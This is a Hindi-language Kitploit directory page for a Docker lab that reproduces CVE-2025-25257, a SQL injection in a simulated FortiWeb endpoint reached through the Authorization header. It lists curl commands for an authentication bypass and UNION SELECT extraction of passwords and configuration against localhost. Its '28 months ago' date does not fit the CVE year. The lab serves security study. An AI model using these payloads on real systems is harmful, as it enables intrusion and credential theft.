Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-25257 — CVE-2025-25257 के लिए पुनरुत्पादनीय Docker प्रयोगशाला, जो एक अनुकरणीय FortiWeb एंडपॉइंट पर HTTP प्राधिकरण हेडर के माध्यम से SQL इंजेक्शन बायपास और डेटा निकासी का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/lytianahkone-boop/cve-2025-25257
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षाडेटाबेस सुरक्षालैब और अभ्यास
GitHublytianahkone-boop/cve-2025-25257

cve-2025-25257

CVE-2025-25257 के लिए पुनरुत्पादनीय Docker प्रयोगशाला, जो एक अनुकरणीय FortiWeb एंडपॉइंट पर HTTP प्राधिकरण हेडर के माध्यम से SQL इंजेक्शन बायपास और डेटा निकासी का प्रदर्शन करता है।

रिपॉजिटरी देखें
28 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-25257 - प्रयोग वातावरण

प्रयोग की वास्तुकला (वातावरण FortiWeb के कमजोर घटकों का अनुकरण करता है)

root@kitploit:~
कमजोर एंडपॉइंट: /api/system/fabric/config
इंजेक्शन वेक्टर: HTTP हेडर Authorization: Bearer
तंत्र: प्रत्यक्ष SQL संयोजन (Python f-string)
प्रमाणीकरण: कोई नहीं (पूर्ण बाईपास)
डेटाबेस: SQLite (प्रदर्शन के लिए)

cve-2025-25257

├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── app.py
├── init_db.py
├── payload.txt
└── README.md

Dockerfile: जानबूझकर कमजोर HTTP सेवा / बिना प्रमाणीकरण के शोषण योग्य API को उजागर करती है

docker-compose.yml: एक पुनरुत्पादन योग्य कमजोर सेवा को व्यवस्थित करता है / http के माध्यम से हमला करने योग्य API को उजागर करता है / प्रयोग वातावरण को अलग करता है

requirements.txt: एक स्थिर और पुनरुत्पादन योग्य वातावरण सुनिश्चित करता है

app.py: पूर्व-प्रमाणीकरण एंडपॉइंट लागू करता है / Authorization के माध्यम से उपयोगकर्ता इनपुट स्वीकार करता है / इस इनपुट को SQL क्वेरी में संयोजित करता है / प्रमाणीकरण बाईपास और डेटा निष्कर्षण की अनुमति देता है

init_db.py: एक शोषण योग्य डेटासेट तैयार करता है / प्रमाणीकरण बाईपास और डेटा एक्सफिल्ट्रेशन का स्पष्ट प्रदर्शन सक्षम करता है

payload.txt कोड निष्पादन का न्यूनतम, नियंत्रित और अवलोकनीय प्रमाण प्रदान करता है

चरण 1: कंटेनर बनाएं और चलाएं

डॉकर इमेज का निर्माण

docker-compose build

कंटेनर प्रारंभ करें

docker-compose up -d

जांचें कि कंटेनर सक्रिय है

docker-compose ps

लॉग देखें

docker-compose logs -f

चरण 2: सेवा की पहुंच की जांच करें

curl http://localhost:8080/api/system/status

चरण 3: कमजोरी का शोषण

गैर-दुर्भावनापूर्ण अनुरोध

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer valid_token_001"

दुर्भावनापूर्ण SQL इंजेक्शन अनुरोध OR 1=1 के साथ बाईपास

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' OR '1'='1"

UNION-SELECT इंजेक्शन के साथ डेटा निष्कर्षण

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, username, password, role, email, NULL FROM users--"

संवेदनशील डेटा का एक्सफिल्ट्रेशन

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, key, value, description, '2025-01-01',NULL FROM system_config--"

चरण 4: सफाई और रोकना

कंटेनर रोकें

docker-compose down

वॉल्यूम हटाएं

docker-compose down -v

इमेज हटाएं

docker rmi cve-2025-25257-lab-fortiweb-vulnerable:latest

टूल डाउनलोड करें